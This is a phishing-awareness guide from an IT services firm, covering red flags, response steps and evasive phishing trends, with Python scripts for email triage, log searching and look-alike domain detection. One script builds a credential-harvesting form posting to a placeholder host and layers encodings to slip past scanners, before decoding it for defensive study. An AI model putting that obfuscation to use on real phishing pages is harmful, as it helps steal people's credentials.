Phishing as we know it has been an established scam since the mid-nineties, if you can believe it. That’s nearly a quarter of a century of scamming! The technique itself hasn’t changed a lot since then, though it has of course grown more sophisticated. The premise and the basic tactic are the same.
We’ll spare you the full-length history lesson, but there’s something important to take away from this. Phishing attacks have been working for nearly 25 years. If they didn’t work, cyber criminals wouldn’t keep doing them. So, don’t get too cocky and assume your business is above such an attack. Everyone is a target of phishing emails, because unfortunately… they work. Let’s look at what phishing means, how a phishing email presents, and how to avoid succumbing to an attack.
What are Phishing Attacks?
Phishing is a type of cyber attack that targets individuals, often at random. Targeted victims receive a fraudulent email posing as a legitimate institution, and the scammer tries to entice them to hand over sensitive data of their own accord. This could be your password, credit card details, answers to security questions, or any other personally identifiable information. The information can then be used to access important accounts, commit identity theft, or cause financial loss.
It sounds like it’s easy to avoid, but phishing frequently uses scare tactics to pressure you into taking the bait. They’ll also offer too-good-to-be-true deals, urgent requests with looming deadlines, misleading hyperlinks, and malicious attachments disguised as something innocuous. Firstly, we’ll run through how to identify a phishing email, so you know what to look for. Then we’ll give you tips on how to avoid falling victim to a phishing scam, plus show you some real examples of phishing.
How do Phishing Links Work?
Phishing links are links created by cyber criminals to pose as links to a legitimate website. Once clicked, they usually lead to a fake login page that captures whatever you type into it, or they trigger a download that installs malware, spyware, ransomware, etc, on your device.
What Does A Phishing Email Look Like?
Chances are you’ve received a phishing email from Apple before. If you don’t own any Apple devices, this would be supremely easy to identify and avoid. But, for the rest of us iPhone addicts, these phishing emails can easily be confused for the real thing if you’re not alert. Personally, I receive a lot of phishing emails from Paypal and Apple, but, at a glance, it’s easy to identify them.
Most inboxes will only show the display name of the sender, like John Smith or Australia Post, for example. So, in the case of my phishing email from Apple, the sender appears to be Apple Payment. But, if we click on the header link to view the sender information, we see the email is actually from this totally professional email: firstname.lastname@example.org—yeah, seriously. Doesn’t exactly scream ‘official Apple business’, does it? Two caveats here: the display name is free text that the sender chooses, so never trust it on its own, and even the address can be forged unless your mail provider enforces SPF, DKIM and DMARC, so a plausible-looking address isn’t proof of legitimacy either.
Look for any combination of the following signs to identify suspicious phishing emails:
Red Flag #1: Dodgy Grammar and Spelling
The biggest giveaway in any generic phishing email is going to be poor spelling and grammar. A real email from a legitimate brand is usually well-crafted in terms of spelling, grammar, and formatting. Scan the email carefully, noting any errors in spelling. But, why do phishing emails have typos in the first place? One common explanation is that scammers include errors deliberately, so that only the least careful recipients respond and the scammer’s follow-up effort isn’t wasted on people who will back out; another is simply that many phishers aren’t writing in their first language. Either way, the absence of typos proves nothing: well-resourced attackers proofread.
Red Flag #2: Odd Manner of Greeting
Many companies you have previously dealt with will address all emails to you personally. The email should address you by name, or be otherwise familiar. A strange Greetings Valued Customer, or similar, should set off alarm bells. As should the email not addressing you at all (see below).
Red Flag #3: Misleading URL
These emails frequently include a link for you to confirm your account details or reset your password, and the link rarely goes where the text claims. How do you know without clicking it? In a desktop mail client or webmail, hover the mouse over the link and the real destination appears in the status bar or a tooltip; on a phone, press and hold the link to preview it. Compare the domain in that destination with the brand’s real domain. Be aware that attackers also use URL shorteners and open redirects on legitimate sites to make the visible destination look harmless, so an unfamiliar or shortened link deserves the same suspicion as an obviously wrong one.
Red Flag #4: Urgent or Threatening Language
A lot of phishing emails will use language that pushes you to act immediately. Either your account has been compromised and your money is gone unless you log in right now, or an amazing once-in-a-lifetime offer is only valid for the next 15 seconds, so CLICK NOW. Legitimate organisations rarely operate on deadlines measured in minutes. Never give in to this tactic.
Red Flag #5: Request for Personal Information
Your bank or any other legitimate institution will not ask you to send your password, full card number or other identifying details by email, nor to enter them on a page you reach from a link in an email. If a message asks for this, treat it as phishing. If you think the request might be genuine, contact the organisation through the phone number or website you already know (not the one in the email) and verify it there.
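Several of these checks (the display name versus the real sender address, a generic greeting, urgent wording, and link text that doesn’t match the link target) can be automated for a quick first look at a suspicious message. The script below is an added example written for this article, not code from the original page or from Stanfield IT. The message it parses is a constructed sample, and the addresses and hostnames in it are placeholders chosen so that each check fires.

```python
import email
import re
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message; the addresses and hostnames are placeholders
# chosen so that each check below fires (assumption: not a real phish).
SAMPLE_EMAIL = """\
From: "Apple Payment" <billing-noreply@mail-update-notice.example>
To: victim@example.com
Subject: Your account has been suspended - act within 24 hours
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Dear Valued Customer,</p>
<p>Your account has been suspended. Verify your details immediately or it will be closed.</p>
<p><a href="http://appleid-verify.example.net/login">https://appleid.apple.com/</a></p>
</body></html>
"""

URGENCY_TERMS = ("immediately", "suspended", "within 24 hours", "act now", "urgent")
GENERIC_GREETINGS = ("dear valued customer", "dear customer", "dear user")


class LinkCollector(HTMLParser):
    """Collect (visible text, href) pairs for every <a> element in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None


def host_of(url_or_text):
    """Hostname of a URL, or of text that looks like one; None if there is none."""
    candidate = url_or_text if "://" in url_or_text else "http://" + url_or_text
    host = urlparse(candidate).hostname
    return host.lower() if host and "." in host else None


def triage(raw_message):
    """Return the list of red flags found in a raw RFC 5322 message."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    flags = []

    # Red flag: display name claims a brand that the sender domain does not contain.
    display_name, address = parseaddr(str(msg["From"]))
    sender_domain = address.rsplit("@", 1)[-1].lower() if "@" in address else ""
    name_words = [w.lower() for w in re.findall(r"[A-Za-z]{3,}", display_name)]
    if sender_domain and name_words and not any(w in sender_domain for w in name_words):
        flags.append(f"display name '{display_name}' does not match sender domain {sender_domain}")

    body = msg.get_body(preferencelist=("html", "plain"))
    html_body = body.get_content() if body else ""
    text = (msg["Subject"] or "") + " " + re.sub(r"<[^>]+>", " ", html_body)
    lowered = text.lower()

    # Red flag: urgent or threatening wording in subject or body.
    hits = [t for t in URGENCY_TERMS if t in lowered]
    if hits:
        flags.append("urgent or threatening language: " + ", ".join(hits))

    # Red flag: generic greeting instead of your name.
    if any(g in lowered for g in GENERIC_GREETINGS):
        flags.append("generic greeting instead of a name")

    # Red flag: link text shows one site while the href points somewhere else.
    collector = LinkCollector()
    collector.feed(html_body)
    for visible, href in collector.links:
        shown, actual = host_of(visible), host_of(href)
        if shown and actual and shown != actual:
            flags.append(f"link text shows {shown} but points to {actual}")

    return flags


if __name__ == "__main__":
    for flag in triage(SAMPLE_EMAIL):
        print("-", flag)
```

The display-name check is deliberately crude (it only asks whether any word of the display name appears in the sender domain), so expect false positives from legitimate senders that mail from a separate notification domain; it is a prompt to look closer, not a verdict. The link check is the one worth keeping: a mismatch between what the link says and where it goes is almost never innocent.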
8 Habits To Help You Avoid a Phishing Scam
We’ve now looked at a few ways in which you can identify a phishing scam. Hopefully, with these tips, you’ll know what to look for with these phishing emails. Therefore, you’ll be able to avoid falling prey to such a scam. However, there are some habits you should try to enforce with yourself and your team. These habits are more or less common sense, but often we overlook the importance of them.
Habit #1: Look for the Lock
Never enter credentials or payment details on a page whose address starts with http rather than https: anything you type is sent in the clear. But don’t read the padlock as proof that a site is genuine. The padlock only means the connection to whatever site you’re on is encrypted, and certificates are free and automated these days, so phishing sites have them too (the cloned myGov site in the real example later in this article showed a padlock). Check the domain in the address bar, not just the padlock, and if you end up on a site that is not secure, don’t enter any information on it.
Habit #2: Watch Out For Pop-Ups
It wasn’t so long ago that pop-ups were solely the domain of malware attacks and phishing attempts. You might remember something like this: Wow! You’re the 1,000,000th Visitor! Click Here to Win Free iPad! Nowadays, legitimate websites are utilising their own pop-ups to push subscriptions and account sign-ups, which gets tedious after a while. If you’re looking to sign up or subscribe to a website, be wary of any pop-ups and make sure you’re going through a secure form.
Habit #3: Never Give Out Personal Info
On that note, be careful what you put into any web form, especially one you reached from a link in an email. A newsletter sign-up needs an email address and maybe a name; it never needs your password, card number or date of birth. If you need to log in to a service, type its address yourself or use its app rather than following the link.
Habit #4: Always Use Antivirus
Antivirus helps when a phishing attack delivers a file: it can block a malicious attachment or a download from a phishing link before it runs, and flag a machine that has already been compromised. It does nothing for the most common case, where you type your password into a fake login page, so it is a backstop for the habits above, not a substitute for them.
Habit #5: Think Before You Click
This is basic common sense when it comes to online etiquette. So many phishing attempts try to trick you with wording and misplaced buttons, or they have disguised urls (as we discussed above). Take your time, make sure you’re somewhere secure, and ensure the link goes where you want it to.
Habit #6: Keep Abreast of Phishing Scams
As mentioned previously, phishing emails have been around for just about 25 years. That means they’ve evolved over time and new ones are forever coming into circulation. Check sites like Scamwatch and Stay Smart Online, which provide updates and news.
Habit #7: Check Your Accounts
This one feels harder because it’s 2020 and you probably have about 300 online accounts for various sites that you can’t even remember anymore. Many of these are probably defunct, or you simply don’t use them. But someone else might have been accessing your account and is using it maliciously. Search your email inbox for “new account” or “confirm email” to find sites you’ve registered for in the past.
Habit #8: Keep Your Browser Updated
Patches and updates that are periodically rolled out are usually designed to repair vulnerabilities and security loopholes that have the potential to be—or already have been—exploited. If there’s an update for your browser, INSTALL IT.
10 Steps To Take After A Phishing Attack
Step #1: Disconnect The Device From Internet
The biggest risk after clicking a phishing link or opening an attachment is that malware or ransomware is downloaded and run within minutes. Disconnect the computer from the network (unplug the cable and turn off Wi-Fi) so that the attacker cannot reach it remotely and malware cannot spread to other machines or send messages to your own contacts. If you typed a password into a phishing page, that password is already gone; disconnecting does not undo it, so move on to Step 4 without delay.
Step #2: Scan for Malware
The next step is to scan your system for any malware that could already be self-replicating to spread through the network. Ensure that the scanning software can run offline, and consider running a second scan with another program after the first to catch anything that was missed.
Step #3: Backup Files/Follow IR
You should have an incident response plan for your business, and now is the time to follow it. This should include protocols for backing up files, restoring any damage and how to go about identifying the cause and source of the breach and how to contain it.
Step #4: Change Password
This is a no-brainer. Even if the victim of the attack didn’t give away any passwords directly, there is no way to be sure the attacker doesn’t now have them. Change the password on the affected account and anywhere the same password was reused, from a device you trust (not the one that may be infected). For a mail account, also sign out all active sessions, revoke app passwords and third-party access, and check for inbox rules or forwarding that the attacker may have added to keep reading your mail; these are a standard follow-on to a compromised mailbox.
Step #5: Notify ScamWatch
ScamWatch is a service run by the Australian Competition and Consumer Commission (ACCC). It provides information on how to recognise, avoid and report scams. Informing ScamWatch provides them with up-to-date information on the latest scams and assists in protecting the community.
Step #6: Contact Your Financial Institution
If you’re afraid that your financial information may be compromised, then contact your bank. Advise them that there was a phishing attack and you can either opt to freeze any accounts, cancel cards, or request account monitoring to watch for suspicious activity.
Step #7: Advise Team
Whether it was you or another team member who fell victim, you still need to keep everyone in the loop. Send out a notice to the whole team advising them of what has occurred. This ensures that everyone stays on their guard as the phishing attempt could very well target other members of the business.
Step #8: Adjust Email Filters to Block Similar Messages
Review the phishing email in question and take steps to adjust email filters so that the email doesn’t get through to other potential victims. The from, subject, and other fields may change with each email, so search for a phrase or keywords you can utilise in the filter.
Step #9: Review Outbound Traffic & DNS Logs
Search your firewall and proxy logs for the indicators from the email: the phishing URL, its hostname, and the IP address it resolved to at the time. Look for any outbound connections to those addresses and note which internal hosts made them. Because phishing hosts change IP addresses quickly, also review DNS query logs for lookups of the phishing domain and its subdomains; a DNS hit shows which host followed the link even when the connection itself went to an address you weren’t searching for.
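The log review in Step 9 is a search for a handful of indicators across two log sources, and it is worth scripting so it can be re-run as new indicators turn up. The script below is an added example written for this article, not code from the original page or from Stanfield IT. The log excerpts are constructed, the indicator hostname and IP address are placeholders, and the two line formats (a simplified BIND-style query log and a generic firewall "permit" line) are assumptions; the two regexes are the part you would adapt to your own vendor’s format.

```python
import re
from collections import defaultdict

# Indicators taken from the phishing email (constructed for this example; the
# hostname and address are placeholders).
IOC_DOMAINS = {"appleid-verify.example.net"}
IOC_IPS = {"203.0.113.45"}   # what the hostname resolved to when the email was triaged

# Constructed log excerpts. The DNS lines follow a simplified BIND query-log
# layout and the firewall lines a generic "permit" format; real formats differ
# by vendor, so the two regexes below are the part you would adapt.
DNS_LOG = """\
2020-02-03T09:14:02Z client 10.0.0.23#53412: query: www.example.com IN A
2020-02-03T09:15:40Z client 10.0.0.23#53418: query: appleid-verify.example.net IN A
2020-02-03T09:15:41Z client 10.0.0.23#53419: query: cdn.appleid-verify.example.net IN A
2020-02-03T09:20:07Z client 10.0.0.57#51020: query: mail.example.com IN MX
"""

FW_LOG = """\
2020-02-03T09:15:42Z permit tcp 10.0.0.23:51776 -> 203.0.113.45:443
2020-02-03T09:15:42Z permit tcp 10.0.0.23:51777 -> 198.51.100.10:443
2020-02-03T09:16:03Z permit tcp 10.0.0.57:52003 -> 203.0.113.45:443
"""

DNS_RE = re.compile(
    r"^(?P<ts>\S+) client (?P<src>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)
FW_RE = re.compile(
    r"^(?P<ts>\S+) permit (?P<proto>\w+) (?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):(?P<dport>\d+)"
)


def domain_matches(qname, ioc_domains):
    """True when qname is an indicator domain or any subdomain of one."""
    q = qname.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in ioc_domains)


def find_dns_hits(log_text, ioc_domains=IOC_DOMAINS):
    """(timestamp, internal host, queried name) for every lookup of an indicator."""
    hits = []
    for line in log_text.splitlines():
        m = DNS_RE.match(line)
        if m and domain_matches(m["qname"], ioc_domains):
            hits.append((m["ts"], m["src"], m["qname"]))
    return hits


def find_fw_hits(log_text, ioc_ips=IOC_IPS):
    """(timestamp, internal host, destination, port) for each connection to an indicator IP."""
    hits = []
    for line in log_text.splitlines():
        m = FW_RE.match(line)
        if m and m["dst"] in ioc_ips:
            hits.append((m["ts"], m["src"], m["dst"], m["dport"]))
    return hits


def affected_hosts(dns_log=DNS_LOG, fw_log=FW_LOG):
    """Map each internal host that touched an indicator to the evidence for it."""
    evidence = defaultdict(list)
    for ts, src, qname in find_dns_hits(dns_log):
        evidence[src].append(f"{ts} DNS lookup of {qname}")
    for ts, src, dst, dport in find_fw_hits(fw_log):
        evidence[src].append(f"{ts} connection to {dst}:{dport}")
    return dict(evidence)


if __name__ == "__main__":
    for host, reasons in sorted(affected_hosts().items()):
        print(host)
        for reason in reasons:
            print("   ", reason)
```

In the constructed data, 10.0.0.23 shows up in both logs, but 10.0.0.57 connected to the phishing IP without ever appearing in the DNS log (a cached answer, or a different resolver). That is exactly why the step says to check both sources: either one alone would have missed a host.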
Step #10: Use the Opportunity to Educate
Take this chance to educate your team and remind them of how they can be responsible for cyber security within the business. Don’t shame or berate the victim unnecessarily, as this may leave others reluctant to come forward. Simply use the situation as an example to raise security awareness and remind your staff to think before they click.
The Most Common Evasive Phishing Trends
Evasive methods of phishing are designed to avoid the traditional means of detection. Unfortunately, they’re working! Take a look at the most common evasive phishing trends so that you and your employees can remain vigilant when on the Internet.
HTML Character Encoding
To display local languages, web browsers and email clients accept several encodings for the same characters: HTML character references such as &#x70; for the letter p, percent-encoding, and Base64 decoded by script. This technique encodes all or part of the phishing page’s HTML in these forms. The browser decodes it and renders the page normally, but a scanner that only pattern-matches the raw source sees no readable login form, brand name or target URL.
Inspection Blocking
Inspection blocking is the technique most often built into phishing kits. The kit carries a blocklist of IP ranges, hostnames and browser user-agent strings belonging to security vendors, cloud scanners and research organisations, and checks every visitor against it. When a visitor matches, the kit serves a “404 page not found” (or redirects to the real brand’s site) instead of the phishing page, so analysts and automated crawlers never see the malicious content while real victims do.
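To make the encoding trick concrete, the script below builds a small phishing page the way a kit might (the login form hidden behind character references, then percent-encoding for JavaScript’s unescape(), then Base64 for atob()) and then peels those layers back off the way a scanner has to. It is an added example written for this article, not code from the original page or from any real phishing kit; the form and the hostname in it are constructed placeholders, and the decoder’s regexes assume simple double-quoted string literals, which is a simplification.

```python
import base64
import html
import re
from urllib.parse import quote, unquote

# Terms a naive scanner looks for in page source. A real scanner has a far
# longer list; these three are enough to show the effect.
SUSPICIOUS = ("<form", "password", "login-verify.example.net")

# The credential form as the browser will eventually render it (constructed;
# the hostname is a placeholder).
PLAIN_FORM = (
    '<form action="http://login-verify.example.net/post.php" method="post">'
    '<input name="user"><input type="password" name="pass"></form>'
)


def encode_charrefs(s):
    """Write every character as a hex numeric character reference (&#x..;).
    Browsers decode these inside attribute values and text."""
    return "".join(f"&#x{ord(c):X};" for c in s)


def build_evasive_page():
    """Stack three encodings the way a kit might.

    Inner: the action URL becomes character references.
    Middle: the whole form is percent-encoded for JavaScript's unescape().
    Outer: the percent-encoded string is Base64 for atob().
    The browser undoes all three; grep on the raw source finds nothing."""
    url = "http://login-verify.example.net/post.php"
    form = PLAIN_FORM.replace(url, encode_charrefs(url))
    percent = quote(form, safe="")
    b64 = base64.b64encode(percent.encode()).decode()
    return ('<html><body><script>document.write(unescape(atob("'
            + b64 + '")))</script></body></html>')


ATOB_RE = re.compile(r'atob\("([A-Za-z0-9+/=]+)"\)')
UNESCAPE_RE = re.compile(r'unescape\("([^"]*)"\)')


def decode_layers(page, max_rounds=10):
    """Peel the encodings a browser would apply until the text stops changing.

    Each round: Base64 inside atob(...), percent-encoding inside unescape(...),
    then HTML character references anywhere. The result is for inspection, not
    execution; the regexes assume simple double-quoted literals (a demo
    simplification)."""
    for _ in range(max_rounds):
        before = page
        page = ATOB_RE.sub(
            lambda m: '"' + base64.b64decode(m.group(1)).decode("utf-8", "replace") + '"',
            page,
        )
        page = UNESCAPE_RE.sub(lambda m: unquote(m.group(1)), page)
        page = html.unescape(page)
        if page == before:
            break
    return page


def scan(page, terms=SUSPICIOUS):
    """Return the suspicious terms present in the page text."""
    lowered = page.lower()
    return [t for t in terms if t in lowered]


if __name__ == "__main__":
    raw = build_evasive_page()
    print("raw source:    ", scan(raw))
    print("after decoding:", scan(decode_layers(raw)))
```

The point of the round loop is that kits nest these layers in arbitrary order and depth, so a decoder has to iterate to a fixed point rather than apply each transform once. The limitation is equally instructive: a kit that builds the string with concatenation, arithmetic or a custom cipher defeats regex peeling entirely, which is why serious analysis tools render the page in a real browser and inspect the resulting DOM.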
URLs in Attachments
Recently, a phishing trend taking off is URLs in attachments. This ultimately means that, instead of compromising links being placed in the body of emails, they are hidden in attachments. This makes detection far more difficult. A common example is a simple PDF being made to look like a OneDrive document, complete with a button that links to a phishing site.
Content Injection
Content injection is not new either, but it is a tried-and-tested method: the attacker compromises a legitimate website and changes part of its content so that a link or form on the real site sends the visitor to the phishing page. Because the visitor started on a site they trust, with the right domain and certificate, the redirection is rarely questioned, which complicates detection. The method is increasing in popularity.
Legitimate Cloud Hosting
Legitimate cloud hosting is a tactic that has grown a lot recently. The attacker hosts the phishing page on a legitimate cloud service such as Microsoft Azure, so the page is served from a subdomain of the provider with the provider’s valid TLS certificate. The domain and padlock look trustworthy to the user, and many security products allowlist the big providers’ domains outright, so the page sails through filters that would have blocked an unknown domain.
Phishing Trends in 2020
Over a month into 2020, it’s important to get our heads around the phishing threats that appeared in 2019 and how they’re going to affect businesses over the next year. As phishing was widely announced as the largest, most impactful, cyber threat for businesses and individuals in 2019, it’s crucial that you act now to safeguard your business.
As phishing threats increased by 46% globally in the third quarter of 2019 (compared to the previous quarter), it’s anticipated that this sustained trend will continue into 2020. Phishing scams are becoming more sophisticated, simpler to create, and appealing to hackers because of the amount of money they can make from a successful scam. In light of this, let’s look at the top phishing trends you need to protect your business from this year.
Phishing Kits
A phishing kit comprises all the tools you need to launch a phishing attack, so people who wouldn’t otherwise have the technical skills to undertake one are able to do so. Phishing kits aren’t anything new, but, like all technology, they’re changing. Today, they are becoming more and more user-friendly, and people can quickly and easily set up and execute campaigns.
In July last year, Cyren had already identified 5,334 unique, brand new phishing kits. Turn-key phishing kits offer novice hackers everything they need to replicate login pages of usually trusted sites. Victims trust these sites, entering their logins, passwords, and other personal details. One thing phishing kits often take advantage of are URL generators that create random, multiple URLs. As there are many of them, even if one URL gets blacklisted there are still other working URLs for the attacker to use. This also allows for short-lived phishing sites, further lessening the chance of detection.
Phishing as a Service
Heard of SaaS (software as a service)? Well, there’s also PaaS (phishing as a service), where attackers can subscribe to phishing services for a set monthly fee. Those selling PaaS subscriptions use legitimate, traditional business practices, promoting their services through professional-looking websites. These websites even have shopping carts, product ratings, and discounts!
As with phishing kits, PaaS allows novices to set up phishing campaigns without much technical knowledge. The service includes both a phishing kit and hosting for the phishing forms at very competitive prices. Criminals can choose from numerous landing-page templates plus a month of hosting, with templates including SharePoint, Office 365, LinkedIn, OneDrive, Google, Adobe, Dropbox, and DocuSign, just to name a few.
A report from Cyren outlines that the introduction of PaaS into the cyber-crime landscape has seen the rapid growth of the creation of new phishing campaigns:
“Today’s reality is that we are seeing more evasive phishing campaigns in the hands of more attackers at less effort and lower cost than in the past, as technically sophisticated phishing attack developers have adopted a SaaS business model to let even the most amateur criminal wanna-be spoof targeted web sites with a high degree of authenticity and embedded evasive tactics.”
Business Email Compromise
Another growing area of phishing (specifically spear phishing, which we delve into below) is business email compromise (BEC). BEC, previously called man-in-the-email scams, uses micro-targeting, honing in on particular people at targeted companies. Tech companies, payment gateways, and financial institutions are the most frequently targeted industries. Firstly, attackers define their targets (commercial, government, or not-for-profit organisations).
They then use social engineering tactics to manipulate victims into transferring large amounts of money into fraudulent accounts—or by giving out sensitive information—by impersonating a business representative through using an email address that appears legitimate (this is called “masquerading”). They trick the victim by using a near-identical username to the trusted person’s name or use a domain near-identical to the trusted person’s company.
Social Engineering
Social engineering isn’t a new area of phishing, but it is changing: larger-scale attacks are anticipated. In the USA, spikes in social engineering scams (including voice deepfakes and SIM swapping, covered below) can be predictably tied to the election cycle, and social engineering is on a growth trajectory in Australia as well.
Voice Technology and Deepfakes
Leveraging advances in artificial intelligence, deepfake technology creates fake or altered audio content that sounds authentic to a human listener. Audio deepfakes are used to impersonate high-profile people such as CEOs and politicians, typically to instruct a subordinate to make an urgent payment. Because they take effort to produce and target senior people, they have so far posed less of a threat to small-to-medium businesses, but any business whose staff act on a phone call from ‘the boss’ without confirming through a second channel is exposed, so it’s still important to stay in the know.
SIM Swapping
SIM swapping is a social engineering ploy that defeats SMS-based 2FA. The attacker first phishes the victim, posing as their mobile carrier, for a one-time code or account details, then uses those to convince the real carrier to port the victim’s phone number to a SIM the attacker controls. The result? The attacker receives every text message and phone call made to that number, including the one-time passcodes for personal, business and bank accounts, and can use them to log in. The defences are to use an authenticator app or hardware security key instead of SMS for 2FA wherever it’s offered, and to set a port-out PIN with your carrier where available.
A Real Phishing Example:
Despite all the warning signs to look for, the main thing to keep in mind is that phishing attacks are always being refined and attackers know that people are looking for giveaway mistakes in phishing emails. So, they have begun to eliminate these glaring red flags that we discussed—let’s have a look at a real phishing attack that hit many Australians last year.
Targeted victims received an email appearing to be from Medicare, prompting them to log in to myGov and update some information. The email was very convincing: it duplicated the real logos from the Medicare and myGov websites.
The “Sign in” link took victims to a cloned myGov website that looked identical to the original, the only giveaway being the URL. At a glance the site looked authentic, and it even showed the padlock, which only tells you the connection was encrypted, not that the site was genuine. So they are definitely becoming more sophisticated. The real myGov URL is my.gov.au, whereas the phishing site was mygovau.net: the same letters with the dots removed and a different top-level domain.
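The near-identical domains used in BEC (see Business Email Compromise above) and the mygovau.net clone in this example are the same trick, and it can be checked mechanically before a human ever looks at the message. The script below is an added example written for this article, not code from the original page or from Stanfield IT. It assumes a short trusted-domain list and a toy public-suffix list (real tooling would use the full Public Suffix List); it extracts the registrable domain of a hostname, folds look-alike characters and dropped dots into a comparison key, and flags a candidate that contains or sits within a small edit distance of a trusted domain, or that embeds a trusted domain as a subdomain.

```python
# Assumptions for this example: your own trusted list replaces TRUSTED, and a
# real deployment uses the full Public Suffix List instead of SUFFIXES.
TRUSTED = {"my.gov.au", "apple.com", "paypal.com"}
SUFFIXES = {"com", "net", "org", "au", "com.au", "net.au", "gov.au"}

# Characters and pairs commonly substituted to imitate a brand name.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})
PAIRS = (("rn", "m"), ("vv", "w"), ("cl", "d"))


def registrable(host):
    """The registrable domain: the label just above the longest matching suffix."""
    labels = host.lower().rstrip(".").split(".")
    for n in (2, 1):
        if len(labels) > n and ".".join(labels[-n:]) in SUFFIXES:
            return ".".join(labels[-n - 1:])
    return host.lower()


def strip_suffix(domain):
    """'mygovau.net' -> 'mygovau', 'my.gov.au' -> 'my'."""
    for suf in sorted(SUFFIXES, key=len, reverse=True):
        if domain.endswith("." + suf):
            return domain[: -len(suf) - 1]
    return domain


def fold(s):
    """Comparison key: no dots or hyphens, look-alike characters normalised."""
    s = s.lower().replace(".", "").replace("-", "").translate(HOMOGLYPHS)
    for a, b in PAIRS:
        s = s.replace(a, b)
    return s


def levenshtein(a, b):
    """Classic edit distance (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(host, trusted=TRUSTED):
    """Return (verdict, reason); verdict is 'trusted', 'lookalike' or 'unrelated'."""
    host = host.lower().rstrip(".")
    reg = registrable(host)
    if reg in trusted:
        return "trusted", f"registrable domain {reg} is on the trusted list"
    label = fold(strip_suffix(reg))
    for t in sorted(trusted):
        # Brand used as a subdomain of an attacker domain, e.g. apple.com.secure-login.net
        if host.startswith(t + ".") or ("." + t + ".") in host:
            return "lookalike", f"{t} appears as a subdomain of {reg}"
        # Compare against both the brand label ("paypal") and the whole domain
        # with dots removed ("mygovau"), since kits imitate either.
        for key in sorted({fold(t), fold(strip_suffix(t))}):
            if len(key) < 4:        # "my" is too short to compare meaningfully
                continue
            if key in label:
                return "lookalike", f"'{label}' contains trusted name '{key}'"
            d = levenshtein(label, key)
            if d <= (1 if len(key) < 8 else 2):
                return "lookalike", f"'{label}' is within edit distance {d} of trusted '{key}'"
    return "unrelated", f"{reg} does not resemble a trusted domain"


if __name__ == "__main__":
    for h in ("my.gov.au", "mygovau.net", "paypa1.com", "apple.com.secure-login.net",
              "support-apple.com", "example.com"):
        verdict, reason = classify(h)
        print(f"{h:30} {verdict:10} {reason}")
```

Run this over the sender domains and link hosts pulled from incoming mail, and anything that comes back as lookalike goes to quarantine or to a human. The thresholds are deliberately tight: a loose edit distance on a short brand name produces a flood of false positives, and the containment check already catches the common “brand-plus-word” registrations.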
This type of phishing scam can be called ‘brandjacking’ as well, wherein scammers forge an email template to look identical to a legitimate and trusted company. This leads victims to let their guard down and are more likely to trust the email, as it contains a familiar layout and logo.
The Most Common Attack: Spear Phishing
We’d also like to touch on spear phishing while we’re on this topic. Spear phishing is a far more targeted type of phishing attack. Consider the analogy between phishing and fishing: ordinary phishing casts a wide net for any of thousands of fish, while spear phishing goes after one specific fish with a specialised tool.
Traditional phishing attempts will send thousands or even millions of emails with no personalisation. The attacker is relying on catching even just a handful of these victims—even 1% of 100,000 attacks is still 1000. That’s 1000 wins.
Spear phishing of course has many features in common with regular phishing attacks. Both appear to come from a trusted source (usually), and both will attempt to lure the victim into giving away personal information.
So, what is Spear Phishing exactly?
The key difference is this: spear phishing attacks are highly personalised and customised towards their target. The attacker will carefully research everything they can about their intended victim. This means combing social media profiles (Twitter, Facebook, LinkedIn, Instagram), researching where the victim works and who they interact with, and building a full profile of the victim.
With this detailed profile on their victim, they are able to craft a very realistic email that is purely designed to fool this one person. It’s scary to think about!
Due to the effort of personalisation and realism that goes into these spear phishing attacks, they are often more likely to succeed than generic phishing attacks. Which is a concerning thought, as these attacks are usually intended to access highly confidential information or corporate secrets.
Overall, it seems that the best thing you can do is keep informed on phishing news and the evolving scams. If you think you’re up to speed, then take this quiz created by Google and see if you can identify a phishing scam on the fly. There is always room for improvement!
If you’re concerned about a phishing attack within your business, or the security of your data, then contact Stanfield IT about it today.